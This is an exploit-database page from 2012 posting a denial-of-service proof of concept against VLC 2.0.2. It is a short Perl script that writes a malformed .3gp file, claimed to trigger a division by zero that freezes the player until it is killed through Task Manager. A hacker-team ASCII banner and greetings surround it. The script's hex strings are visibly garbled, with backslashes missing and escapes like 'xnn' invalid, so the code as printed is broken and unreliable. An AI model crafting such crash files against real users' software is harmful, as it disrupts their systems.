Home / exploitsPDF  

VLC 2.0.2 Division By Zero

Posted on 03 August 2012

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0 _ __ __ __ 1
 1 /'  __ /'__` / \__ /'__` 0
 0 /\_,  ___ /\_/\_   ___  ,_/ /  _ ___ 1
 1 /_/  /' _ ` / /_/_\_<_ /'___  /    /`'__ 0
 0   / /    /   / \__/  \_  \_   / 1
 1  \_ \_ \_\_   \____/ \____\ \__\ \____/ \_ 0
 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
 1  \____/ >> Exploit database separated by exploit 0
 0 /___/ type (local, remote, DoS, etc.) 1
 1 1
 0 [x] Official Website: http://www.1337day.com 0
 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
 0 0
 1 ========================================== 1
 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0
 0 1
 1 dark-puzzle[at]live[at]fr 0
 0 ========================================== 1
 1 Pentesting/exploit coding/bug research 0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

# Exploit Title: VLC 2.0.2 - .3gp Division By Zero.
# Author: Dark-Puzzle .
# Danger : Medium .
# Category :Local Exploit .
# Version: Latest ; 2.0.2 Twoflower (Previous versions are not tested but Maybe Vulnerable)
# Vendor : www.videolan.org
# Software Link : http://www.videolan.org/vlc/releases/2.0.2.html
# Date: 02 Aug 2012 .
----------------------------------------------------------------------------------------
The division by zero occurs a non-response from all playlist DLLs so you cannot play nothing
until you close VLC through the Task Manager
----------------------------------------------------------------------------------------
PoC :

#!/usr/bin/perl
my $a ="x4Dx54x68x64x00x00x00x06x00x00x00x00x00x00";
my $b ="x00x00x00xnnx66x74x79x70x33x67x70";
my $c ="x62x6x74x77x65x65x6ex20x74x68x65x20x68x65x61x64x65x72x20x61 x6ex64x20x74x68x65x20x66x6fx6fx74x65x72x20x74x68x65x72x65x27 x73x20x64x61x72x6bx2dx70x75x7ax7ax6cx65";
my $d ="x33x67x70";

my $file = "darkpuzzle.3gp";

open ($File, ">$file");
print $File $a,$b,$c,$d;
close ($File);

-----------------------------------------------------------------------------------------
* Dark-Puzzle From Datasec Team *
Greetz 2 : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org

 

TOP

Malware :

Exploits :